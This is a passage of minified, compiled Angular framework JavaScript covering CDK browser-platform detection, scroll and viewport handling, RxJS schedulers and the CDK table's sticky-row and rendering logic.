CSS&&!this.EDGE&&!this.TRIDENT,this.WEBKIT=this.isBrowser&&/AppleWebKit/i.test(navigator.userAgent)&&!this.BLINK&&!this.EDGE&&!this.TRIDENT,this.IOS=this.isBrowser&&/iPad|iPhone|iPod/.test(navigator.userAgent)&&!("MSStream"in window),this.FIREFOX=this.isBrowser&&/(firefox|minefield)/i.test(navigator.userAgent),this.ANDROID=this.isBrowser&&/android/i.test(navigator.userAgent)&&!this.TRIDENT,this.SAFARI=this.isBrowser&&/safari/i.test(navigator.userAgent)&&this.WEBKIT}}return t.\u0275fac=function(e){return new(e||t)(At(lm))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const yz=["color","button","checkbox","date","datetime-local","email","file","hidden","image","month","number","password","radio","range","reset","search","submit","tel","text","time","url","week"];function bz(){if(S1)return S1;if("object"!=typeof document||!document)return S1=new Set(yz),S1;let t=document.createElement("input");return S1=new Set(yz.filter(a=>(t.setAttribute("type",a),t.type===a))),S1}let Ly,p3,_g,ow;function ym(t){return function Bhe(){if(null==Ly&&"undefined"!=typeof window)try{window.addEventListener("test",null,Object.defineProperty({},"passive",{get:()=>Ly=!0}))}finally{Ly=Ly||!1}return Ly}()?t:!!t.capture}function Mz(){if(null==_g){if("object"!=typeof document||!document||"function"!=typeof Element||!Element)return _g=!1,_g;if("scrollBehavior"in document.documentElement.style)_g=!0;else{const t=Element.prototype.scrollTo;_g=!!t&&!/\{\s*\[native code\]\s*\}/.test(t.toString())}}return _g}function zy(){if("object"!=typeof document||!document)return 0;if(null==p3){const t=document.createElement("div"),a=t.style;t.dir="rtl",a.width="1px",a.overflow="auto",a.visibility="hidden",a.pointerEvents="none",a.position="absolute";const e=document.createElement("div"),i=e.style;i.width="2px",i.height="1px",t.appendChild(e),document.body.appendChild(t),p3=0,0===t.scrollLeft&&(t.scrollLeft=1,p3=0===t.scrollLeft?1:2),t.remove()}return p3}function _3(t){if(function Hhe(){if(null==ow){const t="undefined"!=typeof document?document.head:null;ow=!(!t||!t.createShadowRoot&&!t.attachShadow)}return ow}()){const a=t.getRootNode?t.getRootNode():null;if("undefined"!=typeof ShadowRoot&&ShadowRoot&&a instanceof ShadowRoot)return a}return null}function g3(){let t="undefined"!=typeof document&&document?document.activeElement:null;for(;t&&t.shadowRoot;){const a=t.shadowRoot.activeElement;if(a===t)break;t=a}return t}function Id(t){return t.composedPath?t.composedPath()[0]:t.target}function rw(){return"undefined"!=typeof __karma__&&!!__karma__||"undefined"!=typeof jasmine&&!!jasmine||"undefined"!=typeof jest&&!!jest||"undefined"!=typeof Mocha&&!!Mocha}const Uhe=["addListener","removeListener"],qhe=["addEventListener","removeEventListener"],Ghe=["on","off"];function Tc(t,a,e,i){if(ie(e)&&(i=e,e=void 0),i)return Tc(t,a,e).pipe(Q6(i));const[n,r]=function $he(t){return ie(t.addEventListener)&&ie(t.removeEventListener)}(t)?qhe.map(c=>d=>t[c](a,d,e)):function jhe(t){return ie(t.addListener)&&ie(t.removeListener)}(t)?Uhe.map(vz(t,a)):function Qhe(t){return ie(t.on)&&ie(t.off)}(t)?Ghe.map(vz(t,a)):[];if(!n&&Gt(t))return Ut(c=>Tc(c,a,e))(pn(t));if(!n)throw new TypeError("Invalid event target");return new G(c=>{const d=(...T)=>c.next(1<T.length?T:T[0]);return n(d),()=>r(d)})}function vz(t,a){return e=>i=>t[e](a,i)}class Khe extends I{constructor(a,e){super()}schedule(a,e=0){return this}}const C3={setInterval(t,a,...e){const{delegate:i}=C3;return null!=i&&i.setInterval?i.setInterval(t,a,...e):setInterval(t,a,...e)},clearInterval(t){const{delegate:a}=C3;return((null==a?void 0:a.clearInterval)||clearInterval)(t)},delegate:void 0};class sw extends Khe{constructor(a,e){super(a,e),this.scheduler=a,this.work=e,this.pending=!1}schedule(a,e=0){if(this.closed)return this;this.state=a;const i=this.id,n=this.scheduler;return null!=i&&(this.id=this.recycleAsyncId(n,i,e)),this.pending=!0,this.delay=e,this.id=this.id||this.requestAsyncId(n,this.id,e),this}requestAsyncId(a,e,i=0){return C3.setInterval(a.flush.bind(a,this),i)}recycleAsyncId(a,e,i=0){if(null!=i&&this.delay===i&&!1===this.pending)return e;C3.clearInterval(e)}execute(a,e){if(this.closed)return new Error("executing a cancelled action");this.pending=!1;const i=this._execute(a,e);if(i)return i;!1===this.pending&&null!=this.id&&(this.id=this.recycleAsyncId(this.scheduler,this.id,null))}_execute(a,e){let n,i=!1;try{this.work(a)}catch(r){i=!0,n=r||new Error("Scheduled action threw falsy error")}if(i)return this.unsubscribe(),n}unsubscribe(){if(!this.closed){const{id:a,scheduler:e}=this,{actions:i}=e;this.work=this.state=this.scheduler=null,this.pending=!1,ae(i,this),null!=a&&(this.id=this.recycleAsyncId(e,a,null)),this.delay=null,super.unsubscribe()}}}const Wy={schedule(t){let a=requestAnimationFrame,e=cancelAnimationFrame;const{delegate:i}=Wy;i&&(a=i.requestAnimationFrame,e=i.cancelAnimationFrame);const n=a(r=>{e=void 0,t(r)});return new I(()=>null==e?void 0:e(n))},requestAnimationFrame(...t){const{delegate:a}=Wy;return((null==a?void 0:a.requestAnimationFrame)||requestAnimationFrame)(...t)},cancelAnimationFrame(...t){const{delegate:a}=Wy;return((null==a?void 0:a.cancelAnimationFrame)||cancelAnimationFrame)(...t)},delegate:void 0};class Fy{constructor(a,e=Fy.now){this.schedulerActionCtor=a,this.now=e}schedule(a,e=0,i){return new this.schedulerActionCtor(this,a).schedule(i,e)}}Fy.now=Kx.now;class cw extends Fy{constructor(a,e=Fy.now){super(a,e),this.actions=[],this._active=!1,this._scheduled=void 0}flush(a){const{actions:e}=this;if(this._active)return void e.push(a);let i;this._active=!0;do{if(i=a.execute(a.state,a.delay))break}while(a=e.shift());if(this._active=!1,i){for(;a=e.shift();)a.unsubscribe();throw i}}}const Az=new class Yhe extends cw{flush(a){this._active=!0;const e=this._scheduled;this._scheduled=void 0;const{actions:i}=this;let n;a=a||i.shift();do{if(n=a.execute(a.state,a.delay))break}while((a=i[0])&&a.id===e&&i.shift());if(this._active=!1,n){for(;(a=i[0])&&a.id===e&&i.shift();)a.unsubscribe();throw n}}}(class Xhe extends sw{constructor(a,e){super(a,e),this.scheduler=a,this.work=e}requestAsyncId(a,e,i=0){return null!==i&&i>0?super.requestAsyncId(a,e,i):(a.actions.push(this),a._scheduled||(a._scheduled=Wy.requestAnimationFrame(()=>a.flush(void 0))))}recycleAsyncId(a,e,i=0){if(null!=i&&i>0||null==i&&this.delay>0)return super.recycleAsyncId(a,e,i);a.actions.some(n=>n.id===e)||(Wy.cancelAnimationFrame(e),a._scheduled=void 0)}});let lw,Jhe=1;const y3={};function Tz(t){return t in y3&&(delete y3[t],!0)}const Zhe={setImmediate(t){const a=Jhe++;return y3[a]=!0,lw||(lw=Promise.resolve()),lw.then(()=>Tz(a)&&t()),a},clearImmediate(t){Tz(t)}},{setImmediate:efe,clearImmediate:tfe}=Zhe,b3={setImmediate(...t){const{delegate:a}=b3;return((null==a?void 0:a.setImmediate)||efe)(...t)},clearImmediate(t){const{delegate:a}=b3;return((null==a?void 0:a.clearImmediate)||tfe)(t)},delegate:void 0},dw=new class afe extends cw{flush(a){this._active=!0;const e=this._scheduled;this._scheduled=void 0;const{actions:i}=this;let n;a=a||i.shift();do{if(n=a.execute(a.state,a.delay))break}while((a=i[0])&&a.id===e&&i.shift());if(this._active=!1,n){for(;(a=i[0])&&a.id===e&&i.shift();)a.unsubscribe();throw n}}}(class ife extends sw{constructor(a,e){super(a,e),this.scheduler=a,this.work=e}requestAsyncId(a,e,i=0){return null!==i&&i>0?super.requestAsyncId(a,e,i):(a.actions.push(this),a._scheduled||(a._scheduled=b3.setImmediate(a.flush.bind(a,void 0))))}recycleAsyncId(a,e,i=0){if(null!=i&&i>0||null==i&&this.delay>0)return super.recycleAsyncId(a,e,i);a.actions.some(n=>n.id===e)||(b3.clearImmediate(e),a._scheduled=void 0)}}),Vy=new cw(sw),nfe=Vy;function M3(t=0,a,e=nfe){let i=-1;return null!=a&&(co(a)?e=a:i=a),new G(n=>{let r=function rfe(t){return t instanceof Date&&!isNaN(t)}(t)?+t-e.now():t;r<0&&(r=0);let c=0;return e.schedule(function(){n.closed||(n.next(c++),0<=i?this.schedule(void 0,i):n.complete())},r)})}function mw(t,a=Vy){return function ofe(t){return Ie((a,e)=>{let i=!1,n=null,r=null,c=!1;const d=()=>{if(null==r||r.unsubscribe(),r=null,i){i=!1;const k=n;n=null,e.next(k)}c&&e.complete()},T=()=>{r=null,c&&e.complete()};a.subscribe(Ae(e,k=>{i=!0,n=k,r||pn(t(k)).subscribe(r=Ae(e,d,T))},()=>{c=!0,(!i||!r||r.closed)&&e.complete()}))})}(()=>M3(t,a))}let By=(()=>{class t{constructor(e,i,n){this._ngZone=e,this._platform=i,this._scrolled=new J,this._globalSubscription=null,this._scrolledCount=0,this.scrollContainers=new Map,this._document=n}register(e){this.scrollContainers.has(e)||this.scrollContainers.set(e,e.elementScrolled().subscribe(()=>this._scrolled.next(e)))}deregister(e){const i=this.scrollContainers.get(e);i&&(i.unsubscribe(),this.scrollContainers.delete(e))}scrolled(e=20){return this._platform.isBrowser?new G(i=>{this._globalSubscription||this._addGlobalListener();const n=e>0?this._scrolled.pipe(mw(e)).subscribe(i):this._scrolled.subscribe(i);return this._scrolledCount++,()=>{n.unsubscribe(),this._scrolledCount--,this._scrolledCount||this._removeGlobalListener()}}):Bi()}ngOnDestroy(){this._removeGlobalListener(),this.scrollContainers.forEach((e,i)=>this.deregister(i)),this._scrolled.complete()}ancestorScrolled(e,i){const n=this.getAncestorScrollContainers(e);return this.scrolled(i).pipe(Dn(r=>!r||n.indexOf(r)>-1))}getAncestorScrollContainers(e){const i=[];return this.scrollContainers.forEach((n,r)=>{this._scrollableContainsElement(r,e)&&i.push(r)}),i}_getWindow(){return this._document.defaultView||window}_scrollableContainsElement(e,i){let n=Gr(i),r=e.getElementRef().nativeElement;do{if(n==r)return!0}while(n=n.parentElement);return!1}_addGlobalListener(){this._globalSubscription=this._ngZone.runOutsideAngular(()=>Tc(this._getWindow().document,"scroll").subscribe(()=>this._scrolled.next()))}_removeGlobalListener(){this._globalSubscription&&(this._globalSubscription.unsubscribe(),this._globalSubscription=null)}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(cr),At(ga,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),uw=(()=>{class t{constructor(e,i,n,r){this.elementRef=e,this.scrollDispatcher=i,this.ngZone=n,this.dir=r,this._destroyed=new J,this._elementScrolled=new G(c=>this.ngZone.runOutsideAngular(()=>Tc(this.elementRef.nativeElement,"scroll").pipe(ea(this._destroyed)).subscribe(c)))}ngOnInit(){this.scrollDispatcher.register(this)}ngOnDestroy(){this.scrollDispatcher.deregister(this),this._destroyed.next(),this._destroyed.complete()}elementScrolled(){return this._elementScrolled}getElementRef(){return this.elementRef}scrollTo(e){const i=this.elementRef.nativeElement,n=this.dir&&"rtl"==this.dir.value;null==e.left&&(e.left=n?e.end:e.start),null==e.right&&(e.right=n?e.start:e.end),null!=e.bottom&&(e.top=i.scrollHeight-i.clientHeight-e.bottom),n&&0!=zy()?(null!=e.left&&(e.right=i.scrollWidth-i.clientWidth-e.left),2==zy()?e.left=e.right:1==zy()&&(e.left=e.right?-e.right:e.right)):null!=e.right&&(e.left=i.scrollWidth-i.clientWidth-e.right),this._applyScrollToOptions(e)}_applyScrollToOptions(e){const i=this.elementRef.nativeElement;Mz()?i.scrollTo(e):(null!=e.top&&(i.scrollTop=e.top),null!=e.left&&(i.scrollLeft=e.left))}measureScrollOffset(e){const i="left",n="right",r=this.elementRef.nativeElement;if("top"==e)return r.scrollTop;if("bottom"==e)return r.scrollHeight-r.clientHeight-r.scrollTop;const c=this.dir&&"rtl"==this.dir.value;return"start"==e?e=c?n:i:"end"==e&&(e=c?i:n),c&&2==zy()?e==i?r.scrollWidth-r.clientWidth-r.scrollLeft:r.scrollLeft:c&&1==zy()?e==i?r.scrollLeft+r.scrollWidth-r.clientWidth:-r.scrollLeft:e==i?r.scrollLeft:r.scrollWidth-r.clientWidth-r.scrollLeft}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(By),Ee(qi),Ee(Cr,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdk-scrollable",""],["","cdkScrollable",""]]}),t})(),bm=(()=>{class t{constructor(e,i,n){this._platform=e,this._change=new J,this._changeListener=r=>{this._change.next(r)},this._document=n,i.runOutsideAngular(()=>{if(e.isBrowser){const r=this._getWindow();r.addEventListener("resize",this._changeListener),r.addEventListener("orientationchange",this._changeListener)}this.change().subscribe(()=>this._viewportSize=null)})}ngOnDestroy(){if(this._platform.isBrowser){const e=this._getWindow();e.removeEventListener("resize",this._changeListener),e.removeEventListener("orientationchange",this._changeListener)}this._change.complete()}getViewportSize(){this._viewportSize||this._updateViewportSize();const e={width:this._viewportSize.width,height:this._viewportSize.height};return this._platform.isBrowser||(this._viewportSize=null),e}getViewportRect(){const e=this.getViewportScrollPosition(),{width:i,height:n}=this.getViewportSize();return{top:e.top,left:e.left,bottom:e.top+n,right:e.left+i,height:n,width:i}}getViewportScrollPosition(){if(!this._platform.isBrowser)return{top:0,left:0};const e=this._document,i=this._getWindow(),n=e.documentElement,r=n.getBoundingClientRect();return{top:-r.top||e.body.scrollTop||i.scrollY||n.scrollTop||0,left:-r.left||e.body.scrollLeft||i.scrollX||n.scrollLeft||0}}change(e=20){return e>0?this._change.pipe(mw(e)):this._change}_getWindow(){return this._document.defaultView||window}_updateViewportSize(){const e=this._getWindow();this._viewportSize=this._platform.isBrowser?{width:e.innerWidth,height:e.innerHeight}:{width:0,height:0}}}return t.\u0275fac=function(e){return new(e||t)(At(cr),At(qi),At(ga,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),uu=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})(),Hy=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[R1,uu,R1,uu]}),t})();const lfe=[[["caption"]],[["colgroup"],["col"]]],dfe=["caption","colgroup, col"];function hw(t){return class extends t{constructor(...a){super(...a),this._sticky=!1,this._hasStickyChanged=!1}get sticky(){return this._sticky}set sticky(a){const e=this._sticky;this._sticky=wi(a),this._hasStickyChanged=e!==this._sticky}hasStickyChanged(){const a=this._hasStickyChanged;return this._hasStickyChanged=!1,a}resetStickyChanged(){this._hasStickyChanged=!1}}}const k1=new ni("CDK_TABLE");let P1=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkCellDef",""]]}),t})(),O1=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkHeaderCellDef",""]]}),t})(),v3=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkFooterCellDef",""]]}),t})();class ffe{}const pfe=hw(ffe);let Nh=(()=>{class t extends pfe{constructor(e){super(),this._table=e,this._stickyEnd=!1}get name(){return this._name}set name(e){this._setNameInput(e)}get stickyEnd(){return this._stickyEnd}set stickyEnd(e){const i=this._stickyEnd;this._stickyEnd=wi(e),this._hasStickyChanged=i!==this._stickyEnd}_updateColumnCssClassName(){this._columnCssClassName=[`cdk-column-${this.cssClassFriendlyName}`]}_setNameInput(e){e&&(this._name=e,this.cssClassFriendlyName=e.replace(/[^a-z0-9_-]/gi,"-"),this._updateColumnCssClassName())}}return t.\u0275fac=function(e){return new(e||t)(Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkColumnDef",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,P1,5),fa(n,O1,5),fa(n,v3,5)),2&e){let r;Vt(r=Bt())&&(i.cell=r.first),Vt(r=Bt())&&(i.headerCell=r.first),Vt(r=Bt())&&(i.footerCell=r.first)}},inputs:{sticky:"sticky",name:["cdkColumnDef","name"],stickyEnd:"stickyEnd"},features:[ki([{provide:"MAT_SORT_HEADER_COLUMN_DEF",useExisting:t}]),ci]}),t})();class fw{constructor(a,e){e.nativeElement.classList.add(...a._columnCssClassName)}}let pw=(()=>{class t extends fw{constructor(e,i){super(e,i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Nh),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["cdk-header-cell"],["th","cdk-header-cell",""]],hostAttrs:["role","columnheader",1,"cdk-header-cell"],features:[ci]}),t})(),_w=(()=>{class t extends fw{constructor(e,i){var n;if(super(e,i),1===(null===(n=e._table)||void 0===n?void 0:n._elementRef.nativeElement.nodeType)){const r=e._table._elementRef.nativeElement.getAttribute("role");i.nativeElement.setAttribute("role","grid"===r||"treegrid"===r?"gridcell":"cell")}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Nh),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["cdk-cell"],["td","cdk-cell",""]],hostAttrs:[1,"cdk-cell"],features:[ci]}),t})();class Dz{constructor(){this.tasks=[],this.endTasks=[]}}const gw=new ni("_COALESCED_STYLE_SCHEDULER");let xz=(()=>{class t{constructor(e){this._ngZone=e,this._currentSchedule=null,this._destroyed=new J}schedule(e){this._createScheduleIfNeeded(),this._currentSchedule.tasks.push(e)}scheduleEnd(e){this._createScheduleIfNeeded(),this._currentSchedule.endTasks.push(e)}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}_createScheduleIfNeeded(){this._currentSchedule||(this._currentSchedule=new Dz,this._getScheduleObservable().pipe(ea(this._destroyed)).subscribe(()=>{for(;this._currentSchedule.tasks.length||this._currentSchedule.endTasks.length;){const e=this._currentSchedule;this._currentSchedule=new Dz;for(const i of e.tasks)i();for(const i of e.endTasks)i()}this._currentSchedule=null}))}_getScheduleObservable(){return this._ngZone.isStable?Sa(Promise.resolve(void 0)):this._ngZone.onStable.pipe(Cn(1))}}return t.\u0275fac=function(e){return new(e||t)(At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),Cw=(()=>{class t{constructor(e,i){this.template=e,this._differs=i}ngOnChanges(e){if(!this._columnsDiffer){const i=e.columns&&e.columns.currentValue||[];this._columnsDiffer=this._differs.find(i).create(),this._columnsDiffer.diff(i)}}getColumnsDiff(){return this._columnsDiffer.diff(this.columns)}extractCellTemplate(e){return this instanceof Uy?e.headerCell.template:this instanceof qy?e.footerCell.template:e.cell.template}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(yd))},t.\u0275dir=Ot({type:t,features:[sa]}),t})();class _fe extends Cw{}const gfe=hw(_fe);let Uy=(()=>{class t extends gfe{constructor(e,i,n){super(e,i),this._table=n}ngOnChanges(e){super.ngOnChanges(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(yd),Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkHeaderRowDef",""]],inputs:{columns:["cdkHeaderRowDef","columns"],sticky:["cdkHeaderRowDefSticky","sticky"]},features:[ci,sa]}),t})();class Cfe extends Cw{}const yfe=hw(Cfe);let qy=(()=>{class t extends yfe{constructor(e,i,n){super(e,i),this._table=n}ngOnChanges(e){super.ngOnChanges(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(yd),Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkFooterRowDef",""]],inputs:{columns:["cdkFooterRowDef","columns"],sticky:["cdkFooterRowDefSticky","sticky"]},features:[ci,sa]}),t})(),A3=(()=>{class t extends Cw{constructor(e,i,n){super(e,i),this._table=n}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(yd),Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkRowDef",""]],inputs:{columns:["cdkRowDefColumns","columns"],when:["cdkRowDefWhen","when"]},features:[ci]}),t})(),Lh=(()=>{class t{constructor(e){this._viewContainer=e,t.mostRecentCellOutlet=this}ngOnDestroy(){t.mostRecentCellOutlet===this&&(t.mostRecentCellOutlet=null)}}return t.mostRecentCellOutlet=null,t.\u0275fac=function(e){return new(e||t)(Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","cdkCellOutlet",""]]}),t})(),yw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["cdk-header-row"],["tr","cdk-header-row",""]],hostAttrs:["role","row",1,"cdk-header-row"],decls:1,vars:0,consts:[["cdkCellOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Lh],encapsulation:2}),t})(),Mw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["cdk-row"],["tr","cdk-row",""]],hostAttrs:["role","row",1,"cdk-row"],decls:1,vars:0,consts:[["cdkCellOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Lh],encapsulation:2}),t})(),T3=(()=>{class t{constructor(e){this.templateRef=e,this._contentClassName="cdk-no-data-row"}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","cdkNoDataRow",""]]}),t})();const wz=["top","bottom","left","right"];class bfe{constructor(a,e,i,n,r=!0,c=!0,d){this._isNativeHtmlTable=a,this._stickCellCss=e,this.direction=i,this._coalescedStyleScheduler=n,this._isBrowser=r,this._needsPositionStickyOnElement=c,this._positionListener=d,this._cachedCellWidths=[],this._borderCellCss={top:`${e}-border-elem-top`,bottom:`${e}-border-elem-bottom`,left:`${e}-border-elem-left`,right:`${e}-border-elem-right`}}clearStickyPositioning(a,e){const i=[];for(const n of a)if(n.nodeType===n.ELEMENT_NODE){i.push(n);for(let r=0;r<n.children.length;r++)i.push(n.children[r])}this._coalescedStyleScheduler.schedule(()=>{for(const n of i)this._removeStickyStyle(n,e)})}updateStickyColumns(a,e,i,n=!0){if(!a.length||!this._isBrowser||!e.some(te=>te)&&!i.some(te=>te))return void(this._positionListener&&(this._positionListener.stickyColumnsUpdated({sizes:[]}),this._positionListener.stickyEndColumnsUpdated({sizes:[]})));const r=a[0],c=r.children.length,d=this._getCellWidths(r,n),T=this._getStickyStartColumnPositions(d,e),k=this._getStickyEndColumnPositions(d,i),q=e.lastIndexOf(!0),Y=i.indexOf(!0);this._coalescedStyleScheduler.schedule(()=>{const te="rtl"===this.direction,pe=te?"right":"left",Re=te?"left":"right";for(const Fe of a)for(let Ne=0;Ne<c;Ne++){const et=Fe.children[Ne];e[Ne]&&this._addStickyStyle(et,pe,T[Ne],Ne===q),i[Ne]&&this._addStickyStyle(et,Re,k[Ne],Ne===Y)}this._positionListener&&(this._positionListener.stickyColumnsUpdated({sizes:-1===q?[]:d.slice(0,q+1).map((Fe,Ne)=>e[Ne]?Fe:null)}),this._positionListener.stickyEndColumnsUpdated({sizes:-1===Y?[]:d.slice(Y).map((Fe,Ne)=>i[Ne+Y]?Fe:null).reverse()}))})}stickRows(a,e,i){if(!this._isBrowser)return;const n="bottom"===i?a.slice().reverse():a,r="bottom"===i?e.slice().reverse():e,c=[],d=[],T=[];for(let q=0,Y=0;q<n.length;q++){if(!r[q])continue;c[q]=Y;const te=n[q];T[q]=this._isNativeHtmlTable?Array.from(te.children):[te];const pe=te.getBoundingClientRect().height;Y+=pe,d[q]=pe}const k=r.lastIndexOf(!0);this._coalescedStyleScheduler.schedule(()=>{var q,Y;for(let te=0;te<n.length;te++){if(!r[te])continue;const pe=c[te],Re=te===k;for(const Fe of T[te])this._addStickyStyle(Fe,i,pe,Re)}"top"===i?null===(q=this._positionListener)||void 0===q||q.stickyHeaderRowsUpdated({sizes:d,offsets:c,elements:T}):null===(Y=this._positionListener)||void 0===Y||Y.stickyFooterRowsUpdated({sizes:d,offsets:c,elements:T})})}updateStickyFooterContainer(a,e){if(!this._isNativeHtmlTable)return;const i=a.querySelector("tfoot");this._coalescedStyleScheduler.schedule(()=>{e.some(n=>!n)?this._removeStickyStyle(i,["bottom"]):this._addStickyStyle(i,"bottom",0,!1)})}_removeStickyStyle(a,e){for(const n of e)a.style[n]="",a.classList.remove(this._borderCellCss[n]);wz.some(n=>-1===e.indexOf(n)&&a.style[n])?a.style.zIndex=this._getCalculatedZIndex(a):(a.style.zIndex="",this._needsPositionStickyOnElement&&(a.style.position=""),a.classList.remove(this._stickCellCss))}_addStickyStyle(a,e,i,n){a.classList.add(this._stickCellCss),n&&a.classList.add(this._borderCellCss[e]),a.style[e]=`${i}px`,a.style.zIndex=this._getCalculatedZIndex(a),this._needsPositionStickyOnElement&&(a.style.cssText+="position: -webkit-sticky; position: sticky; ")}_getCalculatedZIndex(a){const e={top:100,bottom:10,left:1,right:1};let i=0;for(const n of wz)a.style[n]&&(i+=e[n]);return i?`${i}`:""}_getCellWidths(a,e=!0){if(!e&&this._cachedCellWidths.length)return this._cachedCellWidths;const i=[],n=a.children;for(let r=0;r<n.length;r++)i.push(n[r].getBoundingClientRect().width);return this._cachedCellWidths=i,i}_getStickyStartColumnPositions(a,e){const i=[];let n=0;for(let r=0;r<a.length;r++)e[r]&&(i[r]=n,n+=a[r]);return i}_getStickyEndColumnPositions(a,e){const i=[];let n=0;for(let r=a.length;r>0;r--)e[r]&&(i[r]=n,n+=a[r]);return i}}const vw=new ni("CDK_SPL");let E3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","rowOutlet",""]]}),t})(),D3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","headerRowOutlet",""]]}),t})(),x3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","footerRowOutlet",""]]}),t})(),w3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","noDataRowOutlet",""]]}),t})(),I3=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this._differs=e,this._changeDetectorRef=i,this._elementRef=n,this._dir=c,this._platform=T,this._viewRepeater=k,this._coalescedStyleScheduler=q,this._viewportRuler=Y,this._stickyPositioningListener=te,this._ngZone=pe,this._onDestroy=new J,this._columnDefsByName=new Map,this._customColumnDefs=new Set,this._customRowDefs=new Set,this._customHeaderRowDefs=new Set,this._customFooterRowDefs=new Set,this._headerRowDefChanged=!0,this._footerRowDefChanged=!0,this._stickyColumnStylesNeedReset=!0,this._forceRecalculateCellWidths=!0,this._cachedRenderRowsMap=new Map,this.stickyCssClass="cdk-table-sticky",this.needsPositionStickyOnElement=!0,this._isShowingNoDataRow=!1,this._multiTemplateDataRows=!1,this._fixedLayout=!1,this.contentChanged=new Tt,this.viewChange=new zs({start:0,end:Number.MAX_VALUE}),r||this._elementRef.nativeElement.setAttribute("role","table"),this._document=d,this._isNativeHtmlTable="TABLE"===this._elementRef.nativeElement.nodeName}get trackBy(){return this._trackByFn}set trackBy(e){this._trackByFn=e}get dataSource(){return this._dataSource}set dataSource(e){this._dataSource!==e&&this._switchDataSource(e)}get multiTemplateDataRows(){return this._multiTemplateDataRows}set multiTemplateDataRows(e){this._multiTemplateDataRows=wi(e),this._rowOutlet&&this._rowOutlet.viewContainer.length&&(this._forceRenderDataRows(),this.updateStickyColumnStyles())}get fixedLayout(){return this._fixedLayout}set fixedLayout(e){this._fixedLayout=wi(e),this._forceRecalculateCellWidths=!0,this._stickyColumnStylesNeedReset=!0}ngOnInit(){this._setupStickyStyler(),this._isNativeHtmlTable&&this._applyNativeTableSections(),this._dataDiffer=this._differs.find([]).create((e,i)=>this.trackBy?this.trackBy(i.dataIndex,i.data):i),this._viewportRuler.change().pipe(ea(this._onDestroy)).subscribe(()=>{this._forceRecalculateCellWidths=!0})}ngAfterContentChecked(){this._cacheRowDefs(),this._cacheColumnDefs();const i=this._renderUpdatedColumns()||this._headerRowDefChanged||this._footerRowDefChanged;this._stickyColumnStylesNeedReset=this._stickyColumnStylesNeedReset||i,this._forceRecalculateCellWidths=i,this._headerRowDefChanged&&(this._forceRenderHeaderRows(),this._headerRowDefChanged=!1),this._footerRowDefChanged&&(this._forceRenderFooterRows(),this._footerRowDefChanged=!1),this.dataSource&&this._rowDefs.length>0&&!this._renderChangeSubscription?this._observeRenderChanges():this._stickyColumnStylesNeedReset&&this.updateStickyColumnStyles(),this._checkStickyStates()}ngOnDestroy(){[this._rowOutlet.viewContainer,this._headerRowOutlet.viewContainer,this._footerRowOutlet.viewContainer,this._cachedRenderRowsMap,this._customColumnDefs,this._customRowDefs,this._customHeaderRowDefs,this._customFooterRowDefs,this._columnDefsByName].forEach(e=>{e.clear()}),this._headerRowDefs=[],this._footerRowDefs=[],this._defaultRowDef=null,this._onDestroy.next(),this._onDestroy.complete(),f3(this.dataSource)&&this.dataSource.disconnect(this)}renderRows(){this._renderRows=this._getAllRenderRows();const e=this._dataDiffer.diff(this._renderRows);if(!e)return this._updateNoDataRow(),void this.contentChanged.next();const 